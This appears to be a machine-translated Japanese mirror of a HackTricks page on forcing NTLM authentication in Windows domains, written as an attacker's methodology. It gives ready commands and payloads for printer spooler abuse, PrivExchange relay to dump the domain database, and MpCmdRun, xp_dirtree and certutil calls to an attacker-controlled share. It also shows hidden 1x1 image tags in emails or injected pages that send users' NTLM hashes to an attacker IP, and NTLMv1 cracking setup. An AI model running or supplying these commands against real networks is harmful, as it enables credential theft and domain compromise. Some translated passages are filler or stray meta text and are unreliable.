Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md

11 KiB
Raw Blame History

NTLM特権認証を強制する

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

SharpSystemTriggers

SharpSystemTriggersは、サードパーティの依存関係を回避するために、C#とMIDLコンパイラを使用してコーディングされたリモート認証トリガーのコレクションです。

スプーラーサービスの悪用

_Print Spoolerサービスが有効になっている場合、既知のAD資格情報を使用して、ドメインコントローラのプリントサーバーに新しい印刷ジョブの更新を要求し、それをいくつかのシステムに通知するように指示することができます。
プリンタが任意のシステムに通知を送信する場合、そのシステムに認証する必要があります。したがって、攻撃者はPrint Spooler_サービスを任意のシステムに対して認証させることができ、この認証ではサービスはこのコンピュータアカウントを使用します。

ドメイン上のWindowsサーバーの検索

PowerShellを使用して、Windowsボックスのリストを取得します。通常、サーバーが優先されるため、そこに焦点を当てましょう

Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt

スプーラーサービスのリスニングを見つける

@mysmartloginVincent Le TouxSpoolerScannerを若干変更して使用し、スプーラーサービスがリスニングしているかどうかを確認します:

. .\Get-SpoolStatus.ps1
ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}

以下は、プリンタースプーラーサービスの乱用に関する内容です。Windowsハードニング/Active Directory方法論/printers-spooler-service-abuse.mdファイルからの内容です。

You can also use rpcdump.py on Linux and look for the MS-RPRN Protocol

Linux上でrpcdump.pyを使用し、MS-RPRNプロトコルを探すこともできます。

rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN

任意のホストに対してサービスに認証を要求する

ここからSpoolSampleをコンパイルします

SpoolSample.exe <TARGET> <RESPONDERIP>

または、Linuxを使用している場合は、3xocyteのdementor.pyまたはprinterbug.pyを使用します。

python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>

制約のない委任との組み合わせ

もし攻撃者がすでに制約のない委任を利用してコンピュータを侵害している場合、攻撃者はプリンタをこのコンピュータに認証させることができます。制約のない委任により、プリンタのコンピュータアカウントのTGTが制約のない委任を持つコンピュータのメモリに保存されます。攻撃者はすでにこのホストを侵害しているため、彼はこのチケットを取得して悪用することができますチケットの渡し)。

RCP Force authentication

{% embed url="https://github.com/p0dalirius/Coercer" %}

PrivExchange

PrivExchange攻撃は、Exchange ServerのPushSubscription機能の欠陥に起因します。この欠陥により、メールボックスを持つ任意のドメインユーザがExchangeサーバを強制的に認証させることができます。認証はクライアントが提供する任意のホストを介してHTTP経由で行われます。

ExchangeサービスはSYSTEMとして実行され、デフォルトで特権が与えられていますつまり、2019年以前の累積更新プログラムではドメインのWriteDacl特権を持っています。この欠陥を利用して、LDAPにリレーし、ドメインのNTDSデータベースをダンプすることができます。LDAPにリレーできない場合でも、ドメイン内の他のホストにリレーして認証することができます。この攻撃により、認証されたドメインユーザアカウントを使用して直接ドメイン管理者になることができます。

この技術はここからコピーされました。

Windows内部

Windowsマシン内にすでにアクセスしている場合、特権アカウントを使用してWindowsをサーバに接続させることができます。

Defender MpCmdRun

C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt

MSSQL

MSSQLは、Microsoft SQL Serverの略称です。Microsoftが開発したリレーショナルデータベース管理システムRDBMSです。MSSQLは、Windowsプラットフォーム上で動作し、高いパフォーマンスとセキュリティを提供します。MSSQLは、企業や組織で広く使用されており、データの保存、管理、およびアクセスを可能にします。MSSQLは、データベースの作成、テーブルの作成、データの挿入、更新、削除などの操作をサポートしています。また、トランザクションの管理やデータのバックアップと復元などの高度な機能も提供しています。MSSQLは、データのセキュリティを確保するために、アクセス制御や暗号化などのセキュリティ機能も備えています。

EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1

または、この別のテクニックを使用することもできます:https://github.com/p0dalirius/MSSQL-Analysis-Coerce

Certutil

certutil.exeMicrosoftによって署名されたバイナリを使用して、NTLM認証を強制することができます。

certutil.exe -syncwithWU  \\127.0.0.1\share

HTMLインジェクション

メール経由

侵入したいマシンにログインするユーザーのメールアドレスを知っている場合、単に1x1の画像を含むメールを送ることができます。以下のようなHTMLコードを使用します。

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

そして彼がそれを開くと、彼は認証を試みるでしょう。

MitM

コンピュータに対してMitM攻撃を実行し、彼が視覚化することができるページにHTMLを注入することができれば、次のような画像をページに注入してみることができます

<img src="\\10.10.17.231\test.ico" height="1" width="1" />

NTLMv1のクラック

NTLMv1のチャレンジをキャプチャする方法を読んで、それらをクラックする方法を確認してください。
NTLMv1をクラックするには、Responderのチャレンジを「1122334455667788」に設定する必要があることを忘れないでください。

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥